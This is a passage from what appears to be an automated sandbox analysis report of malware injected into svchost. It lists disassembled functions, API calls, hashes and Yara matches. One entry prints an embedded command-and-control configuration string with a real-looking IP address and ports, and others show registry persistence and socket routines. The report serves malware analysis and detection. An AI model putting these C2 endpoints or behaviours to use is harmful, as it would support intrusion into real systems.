                                                                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,02597B80,00000008,02589956,00000000,00000000,?,0258A030,00000000,00000001,00000000,?,0258C1C3,00000018,02597BF0,0000000C), ref: 0258985F
                                                                                                              • __lock.LIBCMT ref: 02589893
                                                                                                                • Part of subcall function 0258C238: __mtinitlocknum.LIBCMT ref: 0258C24E
                                                                                                                • Part of subcall function 0258C238: __amsg_exit.LIBCMT ref: 0258C25A
                                                                                                                • Part of subcall function 0258C238: EnterCriticalSection.KERNEL32(00000000,00000000,?,02589A26,0000000D,02597BA8,00000008,02589B1D,00000000,?,025877F1,00000000,02597AE0,00000008,02587856,?), ref: 0258C262
                                                                                                              • InterlockedIncrement.KERNEL32(?), ref: 025898A0
                                                                                                              • __lock.LIBCMT ref: 025898B4
                                                                                                              • ___addlocaleref.LIBCMT ref: 025898D2
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                              • String ID: KERNEL32.DLL
                                                                                                              • API String ID: 637971194-2576044830
                                                                                                              • Opcode ID: 3b1d4de44625ee834b3f0a7cc9202e61fcd171c35b9f90a446720356f0500d4d
                                                                                                              • Instruction ID: bcb856bd65921f888c49345c5e49918cde1c176f4d22e38f7265b8ec4edd6550
                                                                                                              • Opcode Fuzzy Hash: 3b1d4de44625ee834b3f0a7cc9202e61fcd171c35b9f90a446720356f0500d4d
                                                                                                              • Instruction Fuzzy Hash: 6501AD719407029FEB20AFA5C544359FBE5BF80320F10894ED496A67A0CBB4A648CF19
                                                                                                              Function 04E03D7E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,04E17338,00000008,04E03E86,00000000,00000000,?,04E04550,00000000,00000001,00000000,?,04E08E36,00000018,04E17468,0000000C), ref: 04E03D8F
                                                                                                              • __lock.LIBCMT ref: 04E03DC3
                                                                                                                • Part of subcall function 04E08EAB: __mtinitlocknum.LIBCMT ref: 04E08EC1
                                                                                                                • Part of subcall function 04E08EAB: __amsg_exit.LIBCMT ref: 04E08ECD
                                                                                                                • Part of subcall function 04E08EAB: EnterCriticalSection.KERNEL32(00000000,00000000,?,04E03F56,0000000D,04E17360,00000008,04E0404D,00000000,?,04E01140,00000000,04E17298,00000008,04E011A5,?), ref: 04E08ED5
                                                                                                              • InterlockedIncrement.KERNEL32(?), ref: 04E03DD0
                                                                                                              • __lock.LIBCMT ref: 04E03DE4
                                                                                                              • ___addlocaleref.LIBCMT ref: 04E03E02
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                              • String ID: KERNEL32.DLL
                                                                                                              • API String ID: 637971194-2576044830
                                                                                                              • Opcode ID: a6980370340511f94f06d3e345dc2ddccbdb772ec08f6d0b7bc942c5d438938c
                                                                                                              • Instruction ID: 471b62f98bdec336e18b99e098a00a73cc907ed9c8905366576f6f172c2bad6a
                                                                                                              • Opcode Fuzzy Hash: a6980370340511f94f06d3e345dc2ddccbdb772ec08f6d0b7bc942c5d438938c
                                                                                                              • Instruction Fuzzy Hash: 9201A171441700EBE720AF65D80530AFBE0EF50729F10A50DD8A5963E0CBB4B981CB11
                                                                                                              Function 04DFB7DC Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 32registryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • RegOpenKeyExW.ADVAPI32(80000001,Console,00000000,00000002), ref: 04DFB7F7
                                                                                                              • RegDeleteValueW.ADVAPI32(?,IpDatespecial), ref: 04DFB807
                                                                                                              • RegSetValueExW.ADVAPI32(?,IpDatespecial,00000000,00000003,?,00000004), ref: 04DFB81E
                                                                                                              • RegCloseKey.ADVAPI32(?,?,00000004), ref: 04DFB829
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Value$CloseDeleteOpen
                                                                                                              • String ID: Console$IpDatespecial
                                                                                                              • API String ID: 3183427449-1840232981
                                                                                                              • Opcode ID: bb832416926c4a23d3a98c2b6a58297c0ea86e30a365cc403439029ceed1f7d2
                                                                                                              • Instruction ID: 58e469e65f1e0a84c9398d53eaf533551f3e86750e76d75aeb44285e10430467
                                                                                                              • Opcode Fuzzy Hash: bb832416926c4a23d3a98c2b6a58297c0ea86e30a365cc403439029ceed1f7d2
                                                                                                              • Instruction Fuzzy Hash: 9FF037753C4340BBE3249B61AC4FF56BBA4F788716F10451DBF4475190C665F501C755
                                                                                                              Function 025934E1 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __getptd.LIBCMT ref: 02593502
                                                                                                                • Part of subcall function 0258997B: __getptd_noexit.LIBCMT ref: 0258997E
                                                                                                                • Part of subcall function 0258997B: __amsg_exit.LIBCMT ref: 0258998B
                                                                                                              • __getptd.LIBCMT ref: 02593513
                                                                                                              • __getptd.LIBCMT ref: 02593521
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                              • String ID: MOC$RCC$csm
                                                                                                              • API String ID: 803148776-2671469338
                                                                                                              • Opcode ID: c2d2bb0b3b4a3b34801dee5e585f815839afb52ca616b845d3af1182a03fe333
                                                                                                              • Instruction ID: fb6d4920aa7da15a4b9ddb335928d3b327c9bba518ecc089f79635e3e173b6b8
                                                                                                              • Opcode Fuzzy Hash: c2d2bb0b3b4a3b34801dee5e585f815839afb52ca616b845d3af1182a03fe333
                                                                                                              • Instruction Fuzzy Hash: 35E01A79510108EECB20BBA9C149B783B95FBC8318F1914E1D40EDB222DB68E8508E9A
                                                                                                              Function 04DF9C80 Relevance: 9.1, APIs: 6, Instructions: 108COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • _malloc.LIBCMT ref: 04DF9C8F
                                                                                                                • Part of subcall function 04DFF6C3: __FF_MSGBANNER.LIBCMT ref: 04DFF6DC
                                                                                                                • Part of subcall function 04DFF6C3: __NMSG_WRITE.LIBCMT ref: 04DFF6E3
                                                                                                                • Part of subcall function 04DFF6C3: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,04E04550,00000000,00000001,00000000,?,04E08E36,00000018,04E17468,0000000C,04E08EC6), ref: 04DFF708
                                                                                                              • _free.LIBCMT ref: 04DF9CB3
                                                                                                              • _memset.LIBCMT ref: 04DF9D0B
                                                                                                                • Part of subcall function 04DFA660: GetObjectW.GDI32(?,00000054,?), ref: 04DFA67E
                                                                                                              • CreateDIBSection.GDI32(00000000,00000008,00000000,00000000,00000000,00000000), ref: 04DF9D23
                                                                                                              • _free.LIBCMT ref: 04DF9D34
                                                                                                              • _free.LIBCMT ref: 04DF9D73
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _free$AllocateCreateHeapObjectSection_malloc_memset
                                                                                                              • String ID:
                                                                                                              • API String ID: 1756752955-0
                                                                                                              • Opcode ID: 4b2271ef04f76dbea5c1f696176b3a5928ac3959b47e9203917b77fb5f407607
                                                                                                              • Instruction ID: 71e8e4d2b803b77322c928d19e9324b665c4ec50d58e67ce6b244db63b2ff509
                                                                                                              • Opcode Fuzzy Hash: 4b2271ef04f76dbea5c1f696176b3a5928ac3959b47e9203917b77fb5f407607
                                                                                                              • Instruction Fuzzy Hash: 6931AFF2A007066BE3209F2ADC80B56B7D8FF48314F11857AEA09C7290E7B1F554CBA1
                                                                                                              Function 02585060 Relevance: 9.1, APIs: 6, Instructions: 107networkCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • EnterCriticalSection.KERNEL32(000002FF), ref: 025850AA
                                                                                                              • WSASetLastError.WS2_32(0000139F), ref: 025850C2
                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,?,00000000,000000FF), ref: 025850CC
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CriticalSection$EnterErrorLastLeave
                                                                                                              • String ID:
                                                                                                              • API String ID: 4082018349-0
                                                                                                              • Opcode ID: f8518cd2eb6318141fe872b02f852fae45ecb7d8c07cca6ccf6b419c0b38721f
                                                                                                              • Instruction ID: 9a4858fd306226e15532306bb82cc4524d0ab92c27c89c19792c57ba40e645a3
                                                                                                              • Opcode Fuzzy Hash: f8518cd2eb6318141fe872b02f852fae45ecb7d8c07cca6ccf6b419c0b38721f
                                                                                                              • Instruction Fuzzy Hash: 2031FE72A04244DBD710DFA4E885B7AB7E9FB88710F80491AFD05D7280E7B6A810CB98
                                                                                                              Function 02593793 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __CreateFrameInfo.LIBCMT ref: 025937BB
                                                                                                                • Part of subcall function 0259334B: __getptd.LIBCMT ref: 02593359
                                                                                                                • Part of subcall function 0259334B: __getptd.LIBCMT ref: 02593367
                                                                                                              • __getptd.LIBCMT ref: 025937C5
                                                                                                                • Part of subcall function 0258997B: __getptd_noexit.LIBCMT ref: 0258997E
                                                                                                                • Part of subcall function 0258997B: __amsg_exit.LIBCMT ref: 0258998B
                                                                                                              • __getptd.LIBCMT ref: 025937D3
                                                                                                              • __getptd.LIBCMT ref: 025937E1
                                                                                                              • __getptd.LIBCMT ref: 025937EC
                                                                                                              • _CallCatchBlock2.LIBCMT ref: 02593812
                                                                                                                • Part of subcall function 025933F0: __CallSettingFrame@12.LIBCMT ref: 0259343C
                                                                                                                • Part of subcall function 025938B9: __getptd.LIBCMT ref: 025938C8
                                                                                                                • Part of subcall function 025938B9: __getptd.LIBCMT ref: 025938D6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                              • String ID:
                                                                                                              • API String ID: 1602911419-0
                                                                                                              • Opcode ID: 09207bebd5dbd829e436189cfe823b666a4ea5bb71ac83241ade6e522fba2f9a
                                                                                                              • Instruction ID: 18913d5ff180cf9587ed758cf50cdac4cf019057d03d3d54af8e2a6d50ca29a3
                                                                                                              • Opcode Fuzzy Hash: 09207bebd5dbd829e436189cfe823b666a4ea5bb71ac83241ade6e522fba2f9a
                                                                                                              • Instruction Fuzzy Hash: 23111975C0020AEFDF00EFA4D485AADBBB1FF84310F1084A9E855A7350DB789A15DF54
                                                                                                              Function 04E1160E Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __CreateFrameInfo.LIBCMT ref: 04E11636
                                                                                                                • Part of subcall function 04E11115: __getptd.LIBCMT ref: 04E11123
                                                                                                                • Part of subcall function 04E11115: __getptd.LIBCMT ref: 04E11131
                                                                                                              • __getptd.LIBCMT ref: 04E11640
                                                                                                                • Part of subcall function 04E03EAB: __getptd_noexit.LIBCMT ref: 04E03EAE
                                                                                                                • Part of subcall function 04E03EAB: __amsg_exit.LIBCMT ref: 04E03EBB
                                                                                                              • __getptd.LIBCMT ref: 04E1164E
                                                                                                              • __getptd.LIBCMT ref: 04E1165C
                                                                                                              • __getptd.LIBCMT ref: 04E11667
                                                                                                              • _CallCatchBlock2.LIBCMT ref: 04E1168D
                                                                                                                • Part of subcall function 04E111BA: __CallSettingFrame@12.LIBCMT ref: 04E11206
                                                                                                                • Part of subcall function 04E11734: __getptd.LIBCMT ref: 04E11743
                                                                                                                • Part of subcall function 04E11734: __getptd.LIBCMT ref: 04E11751
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                              • String ID:
                                                                                                              • API String ID: 1602911419-0
                                                                                                              • Opcode ID: 5415e2a2aca42f49521902f94d57b1e19e85c66b3c9f03acc961ff31fc819dfc
                                                                                                              • Instruction ID: 96d495dea35c33ebb192c55a585b59d04d9f9d60841388276a5905bbba8c6ad2
                                                                                                              • Opcode Fuzzy Hash: 5415e2a2aca42f49521902f94d57b1e19e85c66b3c9f03acc961ff31fc819dfc
                                                                                                              • Instruction Fuzzy Hash: BA112B71D10309DFEF00EFA4C484AEDBBB0FF08314F109169E925AB290DB38AA529F50
                                                                                                              Function 0258DAAE Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __getptd.LIBCMT ref: 0258DABA
                                                                                                                • Part of subcall function 0258997B: __getptd_noexit.LIBCMT ref: 0258997E
                                                                                                                • Part of subcall function 0258997B: __amsg_exit.LIBCMT ref: 0258998B
                                                                                                              • __amsg_exit.LIBCMT ref: 0258DADA
                                                                                                              • __lock.LIBCMT ref: 0258DAEA
                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 0258DB07
                                                                                                              • _free.LIBCMT ref: 0258DB1A
                                                                                                              • InterlockedIncrement.KERNEL32(044020D0), ref: 0258DB32
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                              • String ID:
                                                                                                              • API String ID: 3470314060-0
                                                                                                              • Opcode ID: 32efcaeaa2538315f21ba601a9a3614d5da4f02895c9b022eb760184ecd35938
                                                                                                              • Instruction ID: 43cb6adb4ce8ceb30295bb595125937eb2870b1527163693bd773d72a8c8cef8
                                                                                                              • Opcode Fuzzy Hash: 32efcaeaa2538315f21ba601a9a3614d5da4f02895c9b022eb760184ecd35938
                                                                                                              • Instruction Fuzzy Hash: 56017932D466129BDB15BF759444B6DBBB2BB44721F110009E800B72C0CBB4A951DFDD
                                                                                                              Function 025848C0 Relevance: 9.0, APIs: 6, Instructions: 36sleepsynchronizationCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 025848D1
                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 025848DC
                                                                                                              • Sleep.KERNEL32(00000258), ref: 025848E9
                                                                                                              • CloseHandle.KERNEL32(?), ref: 02584904
                                                                                                              • CloseHandle.KERNEL32(?), ref: 0258490D
                                                                                                              • Sleep.KERNEL32(0000012C), ref: 0258491E
                                                                                                                • Part of subcall function 02583F50: GetCurrentThreadId.KERNEL32 ref: 02583F55
                                                                                                                • Part of subcall function 02583F50: send.WS2_32(?,02597420,00000010,00000000), ref: 02583FB6
                                                                                                                • Part of subcall function 02583F50: SetEvent.KERNEL32(?), ref: 02583FD9
                                                                                                                • Part of subcall function 02583F50: InterlockedExchange.KERNEL32(?,00000000), ref: 02583FE5
                                                                                                                • Part of subcall function 02583F50: WSACloseEvent.WS2_32(?), ref: 02583FF3
                                                                                                                • Part of subcall function 02583F50: shutdown.WS2_32(?,00000001), ref: 0258400B
                                                                                                                • Part of subcall function 02583F50: closesocket.WS2_32(?), ref: 02584015
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Close$EventHandleObjectSingleSleepWait$CurrentExchangeInterlockedThreadclosesocketsendshutdown
                                                                                                              • String ID:
                                                                                                              • API String ID: 1019945655-0
                                                                                                              • Opcode ID: 5d5e0888ca6033fde68e7120744e4a50b9f8ddf3ac55a463301e0aec675f75a6
                                                                                                              • Instruction ID: 483c6f8635ad2378df9ad403dfe39a1b93b46ac88e989689b3846310ad1502bb
                                                                                                              • Opcode Fuzzy Hash: 5d5e0888ca6033fde68e7120744e4a50b9f8ddf3ac55a463301e0aec675f75a6
                                                                                                              • Instruction Fuzzy Hash: 8CF030766047019BC620EBA9DC84D5AF3E9EFC9720B114B09E26997290CAB4E8158BA4
                                                                                                              Function 04C771EF Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 240COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3349974011.0000000004C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4c70000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _memset$_vswprintf_s
                                                                                                              • String ID: D
                                                                                                              • API String ID: 3424173483-2746444292
                                                                                                              • Opcode ID: db93658889c9cac5b66fb2864cdc776cd0bb09df6381925f380574511ea077d7
                                                                                                              • Instruction ID: b60fab656e2ab45d6cd3310dde0ea8a1048563f64878172bb43e0458265c3d7d
                                                                                                              • Opcode Fuzzy Hash: db93658889c9cac5b66fb2864cdc776cd0bb09df6381925f380574511ea077d7
                                                                                                              • Instruction Fuzzy Hash: 6481AA71A40218BBE731DB659C89FEB777DEF99704F104098F708A6181DBB0AB858F64
                                                                                                              Function 02585D60 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 87stringCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • lstrlenW.KERNEL32(000012A0,?,?,?,?,?,02585E77,p1:,0259C6FE,00000000,0259C6E0,00000000,000012A0,|p1:47.239.116.158|o1:6666|t1:1|p2:47.239.116.158|o2:8888|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:), ref: 02585D78
                                                                                                              • _memset.LIBCMT ref: 02585D82
                                                                                                              • lstrlenW.KERNEL32(|p1:47.239.116.158|o1:6666|t1:1|p2:47.239.116.158|o2:8888|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:,?,?,?,?,?,02585E77,p1:,0259C6FE,00000000,0259C6E0,00000000,000012A0,|p1:47.239.116.158|o1:6666|t1:1|p2:47.239.116.158|o2:8888|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:), ref: 02585D8F
                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,?,?,02585E77,p1:,0259C6FE,00000000,0259C6E0,00000000,000012A0,|p1:47.239.116.158|o1:6666|t1:1|p2:47.239.116.158|o2:8888|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:), ref: 02585D97
                                                                                                              Strings
                                                                                                              • |p1:47.239.116.158|o1:6666|t1:1|p2:47.239.116.158|o2:8888|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:, xrefs: 02585D8A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: lstrlen$_memset
                                                                                                              • String ID: |p1:47.239.116.158|o1:6666|t1:1|p2:47.239.116.158|o2:8888|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:
                                                                                                              • API String ID: 2425037729-42098077
                                                                                                              • Opcode ID: 98136556b0ccc42f9ce8a65fe3c9cdf857bed3e65ed316bf608c521e7328d48c
                                                                                                              • Instruction ID: 1fa27fcd51bb6852c8fac1aebe43c6565463c212785e93a61d50db746ae33591
                                                                                                              • Opcode Fuzzy Hash: 98136556b0ccc42f9ce8a65fe3c9cdf857bed3e65ed316bf608c521e7328d48c
                                                                                                              • Instruction Fuzzy Hash: A2214C73F011256BCF247F15EC406AE7399FB84720B970069DC04E7200F7B15E5186E4
                                                                                                              Function 02A1350D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • ___BuildCatchObject.LIBCMT ref: 02A13520
                                                                                                                • Part of subcall function 02A1347B: ___BuildCatchObjectHelper.LIBCMT ref: 02A134B1
                                                                                                              • _UnwindNestedFrames.LIBCMT ref: 02A13537
                                                                                                              • ___FrameUnwindToState.LIBCMT ref: 02A13545
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3345070075.0000000002A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2a00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                                              • String ID: csm$csm
                                                                                                              • API String ID: 2163707966-3733052814
                                                                                                              • Opcode ID: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                                                                                                              • Instruction ID: 7aebf08c7ee2057fc9416ea7b58e37095f974ce99f3a4b035681884a6f4915a5
                                                                                                              • Opcode Fuzzy Hash: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                                                                                                              • Instruction Fuzzy Hash: 93014671040119BFDF22AF51CD40EEA7F6AEF08364F008090BD5814160DB32D9B1DFA4
                                                                                                              Function 04C9137A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • ___BuildCatchObject.LIBCMT ref: 04C9138D
                                                                                                                • Part of subcall function 04C912E8: ___BuildCatchObjectHelper.LIBCMT ref: 04C9131E
                                                                                                              • _UnwindNestedFrames.LIBCMT ref: 04C913A4
                                                                                                              • ___FrameUnwindToState.LIBCMT ref: 04C913B2
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3349974011.0000000004C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4c70000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                                              • String ID: csm$csm
                                                                                                              • API String ID: 2163707966-3733052814
                                                                                                              • Opcode ID: acebe2f2dd98b05ece9ef9f4cf680833d2c7afe621d7ef915d180bda475f8e40
                                                                                                              • Instruction ID: e14527ec2469a0c4940f90bd734088572ad53b3b0309ba3637cb6b2dfb32059f
                                                                                                              • Opcode Fuzzy Hash: acebe2f2dd98b05ece9ef9f4cf680833d2c7afe621d7ef915d180bda475f8e40
                                                                                                              • Instruction Fuzzy Hash: 7001FB7140110ABBEF126F52CC49EEA7FABFF08358F088011FD5855520DB32A9B1EBA4
                                                                                                              Function 02593B40 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • ___BuildCatchObject.LIBCMT ref: 02593B53
                                                                                                                • Part of subcall function 02593AAE: ___BuildCatchObjectHelper.LIBCMT ref: 02593AE4
                                                                                                              • _UnwindNestedFrames.LIBCMT ref: 02593B6A
                                                                                                              • ___FrameUnwindToState.LIBCMT ref: 02593B78
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                                              • String ID: csm$csm
                                                                                                              • API String ID: 2163707966-3733052814
                                                                                                              • Opcode ID: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                                                                                                              • Instruction ID: c1dc63e69f4db2cfc44812a31ef357b7e3bb16fbe67e41826799ccd66b20bf3b
                                                                                                              • Opcode Fuzzy Hash: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                                                                                                              • Instruction Fuzzy Hash: 8A01EF7240110AFBDF22AF51DC48EAA7F6BFF48354F0040A0BD5965120E732D9A1DBA9
                                                                                                              Function 04C7963F Relevance: 7.6, APIs: 5, Instructions: 108COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3349974011.0000000004C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4c70000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _free$_malloc_memset
                                                                                                              • String ID:
                                                                                                              • API String ID: 2102557794-0
                                                                                                              • Opcode ID: d70878f2851c3567c271e931555f1996d9542e4474f1755c76b641d8c5b06530
                                                                                                              • Instruction ID: a9bdacd272b3bca2d8cf648793d02214ed3a9a307c772e69720945efbe3da3e1
                                                                                                              • Opcode Fuzzy Hash: d70878f2851c3567c271e931555f1996d9542e4474f1755c76b641d8c5b06530
                                                                                                              • Instruction Fuzzy Hash: 8631A0F26003056BF7109F6AD8C1B56B7E9BF48314F00863ADA09C7641EBB1F554C795
                                                                                                              Function 02583C80 Relevance: 7.6, APIs: 5, Instructions: 98networkCOMMON
                                                                                                              Download Yara Rule
